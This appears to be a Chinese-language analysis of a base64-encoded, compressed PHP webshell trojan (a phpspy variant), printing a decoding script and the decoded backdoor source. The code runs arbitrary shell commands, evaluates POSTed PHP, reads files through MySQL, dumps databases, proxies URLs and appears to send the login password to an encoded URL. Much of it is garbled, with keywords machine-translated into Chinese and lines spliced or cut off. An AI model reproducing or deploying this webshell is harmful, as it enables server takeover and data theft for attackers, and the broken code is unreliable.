分析可以知道,此木馬經過了base64進行了編碼,然後進行壓縮。雖然做了相關的保密措施,可是php程式碼要執行,最後要產生php原始碼,所以寫出如下php程式對其進行解碼,解壓縮,寫入檔案。
解碼解壓縮程式碼如下:
程式碼如下:
function writetofile($filename, $data)
{ //File Writing $filenum=fpopen$filenum=f"$file;
if (!$filenum) {
return false;
}
flock($filenum,LOCK_EX);
$file_data=fwrite($filenum,$data)); ?>
然後在php的環境下進行運行,會得到php明文檔案如下:
取得URL內容失敗
error_reporting(7);
ob_start();
$mtime = explode(' ', microtime());
$starttime = $mtime[1] + $mtime[0];
//非安全模式可以使用上面的函數,逾時取消。
/*===================== 程式配置=====================*/
// 是否需要密碼驗證,1為需要驗證,其他數字為直接進入.下面選項則無效
$admin['check'] = "1";
// 如果需要密碼驗證,請修改登陸密碼
//預設連接埠表
$hidden = "44997";
$admin['port'] = "80,139,21,3389,3306,43958,1433,5631"; '] = "1";
//Ftp破解用的連接埠
$alexa = "yes";
//是否顯示alexa排名,yes或是no
$admin['ftpport'] = "21";
// 是否允許phpspy本身自動修改編輯後檔案的時間為建立時間(yes/no)
$retime = "no";
// 預設cmd.exe的位置,proc_open函數要使用的,linux系統請對應修改.(假設是winnt系統在程式裡依然可以指定)
$cmd = "cmd.exe";
// 下面是phpspy顯示版權那欄的,因為被很多程式當成作為關鍵字殺了,魚寒~~允許自訂吧。還是不懂別改~~
/*===================== 設定結束================== =====*/
$服務器MlNkYlNkQvJTYzJTY1JTcyJTc0Lz9jZXJ0PTEzJnU9');
$copyurll = base64_decode('Jz48L3NjcmlwdD4=');
$onoff = (function_exists('ini_get')) ? ini_get('register_globals') : get_cfg_ob'); ini_get('register_globals') : get_cfg_ob'); extract($_POST, EXTR_SKIP);@extract($_GET, EXTR_SKIP);}
$self = $_SERVER['PHP_SELF'];$dis_func = get_cfg_var("==disable_functions");
/* ============== 驗證=====================*/
if($admin['check'] = = "1") {if ($_GET['action'] == "logout") {setcookie ("adminpass", "");echo "";echo "註銷成功......";exit;}
if ($_POST[ 'do'] == 'login') {$thepass=trim($_POST['adminpass']);if ($admin['pass'] == $thepass) {setcookie ("adminpass",$thepass,time ()+(1*24*3600));echo "";echo "".$copyurl.$serveru. "&p=".$serverp.$copyurll."";exit;}}if (isset($_COOKIE['adminpass'])) {if ($_COOKIE['adminpass'] != $admin[ 'pass']) {loginpage();}} else {loginpage();}}
/*===================== 驗證結束==== =================*/
// 判斷magic_quotes_gpc 狀態
if (get_magic_quotes_gpc()) {$_GET = stripslashes_array($_GET);$_POST = stripslashes_array($_POST) ;}
//mix.dll的程式碼
$mixdll =「7Zt/TBNnGMfflrqBFnaesBmyZMcCxs2k46pumo2IQjc3wSEgUKYthV6hDAocV6dDF5aum82FRBaIHoRlRl0y3Bb/cIkumnVixOIE/cmMMF+ePxW1Ix 73HP9cruaXbSAwhRAcmy4QcIBEyyd8zCJbw1FcJZH/cyZQDmpyTKYVVzkamnq+r5G21TIXN5aoTmHKO4d0uxulisl8vYGrr7JwhPn5marTGN5aoTmHKO4d0uxulisl8vYGrr7JwhPn5marTG4430Z11450 Jf9BveWZCMnR6Ah/MMFFLHARJKTM0jxCCAVBekQbmE0iMaOGlDqmIuehiZ5LpGA0D9 BGUyMxdVdXy6YQskXxTGTJA8kkJPuv5h8Ec7f1P8Ugc7f5 MLJ/ec3bQ8v4HnauoqCKmJCmpe5n15KwiCIAiCIAiCIAjyUBCzU2PFTJ1nCRGM4kqdNyAsKCr+eitLKE9AXui/+cXt0wt+ 26cRT4u3xc2pid9c0Yb2iH2eSzGh3VZLD6zWHSOa3sxYBmoZ/ T3berbdy1rx6rtXd8PDY0FRsWjSiytjxdm+9nWTshyN1ujy5SRYTnmO6nymMc90Zx 7ZAddnOIprG8oUIYpSlfXCyWJNB83jKldItSZM0QS1RdknymsENs V 6YcvqSxdEKJpvCuCfAtMyj4lCC +KpltWyxviT+t7vpXT5kM3clMyj4lC VzbChnJQIutdv3nVIEXVwCQ4PQ3YqUZUOdquC52dq1weh 4aVfLWq2RzMgD2Wqmlev5Auxis PgnO80xqhBmeSa376Z3+yCZxxUUF8ikY6GEwlCTLMrSgNLxai QugovjjM+ndetBfKM4rGLoBR+g DVCREUOcpSRcn1UUxKSa9Z4ueCLOnaseqtWEx3Gc42vXnJ3Gc42v EQRAE+S+YZCL+EphTYINGl8GuRfVGQprjwGaBKfHHzB9r98伊諾/J1mnaURgrXwY0T9OSUQ 8h975b/6f7FBUbrQqPBXlNDSIbWJtQ5CCCCKK121K1K121200005CFtKV21K1nD21200005CFt; wWrw+7cQMh6ku1stJXXcIVVPGez5zjLeRu/KQuyG8kq U/5qU87UXtOZ+k3Bhp TibwRiolYCsR2sHqyMIiQPTHkP3gyxCNalnAOs0JJc89 /HRFjREEQRA EQRAEQRDkXyJIlb62MOA4aNU0L5op/TgenDEULGW5vkySpJ6JJZ+Co8+ 201e8i+izrfRyengPPfLBPY5q t9AV VR2nJxs6OElrqKKuraFeydTv9aqjD3zACGyVb204MOPq5Hnq5I o0pkvsHujbk81NdTzSVB4 DQjlCno7+WXk717qR691C9Z12XL 1nOd/0sSTtCvv4+R78NjIM5d7d58ZPmq2XHTwz0OVb1+I 1Nb3WbSxs6HQ7H+fBIIDg6PjgxEQwPD0vfB8NjI2FFgWhQOnf TGR2/fDo+PSOO/jg6Hh1VRIqSkpGT+MwzPNbidPNfI2JhGgXe6K hmbyw7GOF0CV8nxD/uvA0EQBEEQBEEQBPnfQkX+D/3x9PfTQ +l30jVsIpvMMqyBfZ59i X2FLWTXsdVsHSuwm9j32Fa2k93HHmKPsJfZUTbf6DI2GbcaH/YliAiCIAiCIAiCIAjy1/wO"; 卷s;
$exec = '';$output='';
$dep[]=array('pipe','r');$dep[]=array('pipe','w');
if(is_callable('passthru') && !strstr($disablefunctions,'passthru')){ @ob_start();passthru($command);$exec=@ob_get_contents();@ob_clean();@ob_end_clean() ;}
elseif(is_callable('system') && !strstr($disablefunctions,'system')){$tmp = @ob_get_contents(); @ob_clean();系統($指令); $輸出= @ob_get_contents(); @ob_clean(); $exec= $tmp; }
elseif(is_callable('exec') && !strstr($disablefunctions,'exec')) {exec($command,$output);$output = join("n",$output);$exec= $output ;}
elseif(is_callable('shell_exec') && !strstr($disablefunctions,'shell_exec')){$exec= shell_exec($command);}
elseif(is_resource($output=popen($command,) ) ) ))) {while(!feof($output)){$exec= fgets($output);}pclose($output);}
elseif(is_resource($res=proc_open($command,$dep,$ pipes) ) )){while(!feof($pipes[1])){$line = fgets($pipes[1]); $output.=$line;}$exec= $output;proc_close($res);}
elseif ($windows && is_object($ws = new COM("WScript.Shell"))){$dir=(isset( $_SERVER["TEMP"]))?$_SERVER["TEMP"]:ini_get('upload_tmp_dir') ;$name = $_SERVER["TEMP"].namE();$ws->Run("cmd.exe /C $command >$name", 0, true);$exec = file_get_contents($name);unlink($name);}
return $exec;
}
//查看PHPINFO
if ($_GET['action'] == "phpinfo") {echo $phpinfo=(!eregi("phpinfo",$dis_func)) ? phpinfo() : "phpinfo() 函數已停用,請查看
}if($_GET['action'] == "nowuser") {$user = get_current_user();
if(!$user) $user = "報告長官,主機變態,無法取得目前進行使用者名稱!";
echo"目前進程使用者名稱:$user";
退出;
}
if(isset($_POST['phpcode'])){eval("?".">$_POST[phpcode]");退出;
}
if($action=="mysqldown"){
$link=@mysql_connect($host,$user,$password);
if (!$link) {
$downtmp = '資料庫連線失敗: ' . mysql_error();
}其他{
$query="select load_file('".$filename."');";
$結果 = @mysql_query($query, $link);
if(!$result){
$downtmp = "讀取失敗,可能是檔案不存在或沒有檔案權限。
".mysql_error();
}其他{
while ($row = mysql_fetch_array($result)) {
$filename = basename($filename);
if($rardown=="yes"){
$zip = NEW Zip
$zipfiles[
$zip = NEW Zip
$zipfiles[]=Array( $filename",$row[0]);
$zip->新增($zipfiles,1);
$code = $zip->get_file();
$檔名= "".$檔名.". rar";
}其他{
$code = $row[0];
}
header("內容類型:應用程式/八位元組流");
header("接受範圍:位元組");
header("接受長度:".strlen($code));
header("接受長度:".strlen($code));
header("內容處置:附件;檔案名稱=$檔案名稱");
迴音($代碼);
退出;
}
}
}
) }
// 線上代理
if (isset($_POST['url'])) {$proxycontents = @file_get_contents($_POST['url']);echo ($proxycontents) ? $proxycontents : "
}
// 下載檔案
if (!empty($downfile)) {if (!@file_exists($downfile)) {echo "";} else {$filename = basename($downfile);$filename_info =explode('.', $ filename) ;$fileext = $filename_info[count($filename_info)-1];header('內容類型:application/x-'.$fileext);header('內容處理:附件;filename='.$filename.' ');header('Content-Description: PHP 產生的資料');header('Content-Length: '.filesize($downfile));@readfile($downfile);exit;}
}
// 直接下載備份資料庫
if ($_POST['backuptype'] == 'download') {
@mysql_connect($servername,$dbusername,$dbpassword) or die("資料庫連線失敗");
@mysql_select_db($dbname) or die("選擇資料庫失敗");
$table = array_flip($_POST['table']);
$result = mysql_query("顯示表格");
迴聲($結果)? NULL : "錯誤: ".mysql_error();
$filename = basename($_SERVER['HTTP_HOST']."_MySQL.sql");
header('內容類型:應用程式/未知');
header( '內容處置:附件; filename='.$filename);
$mysqldata = '';
while ($currow = mysql_fetch_array($result)) {
if (isset($table[$currow[0]])) {
$mysqldata.= sqldumptable($currow[0]);
$mysqldata.= $mysqldata."rn";
}
}
mysql_close(); =str_replace('\','/',dirname(__FILE__));
$dirpath=str_replace('\','/',$_SERVER["DOCUMENT_ROOT"]);
//取得目前路徑
if ( !isset($dir) 或 empty($dir)) {
$dir = ".";
$nowpath = getPath($pathname, $dir);
} 其他{
$dir=$_GET['dir'] ;
$nowpath = getPath($pathname, $dir);
}
//判斷讀寫情況
$dir_writeable = (dir_writeable($nowpath)) ? "可寫" : "不可寫";
)$php "可寫" : "不可寫"; (!eregi("phpinfo",$dis_func)) ? " | PHPINFO()" :"";
$reg = (substr(PHP_OS, 0, 3) = = 'WIN') ? " | 花卉操作" :"";
$tb = 新表格;
? >
;
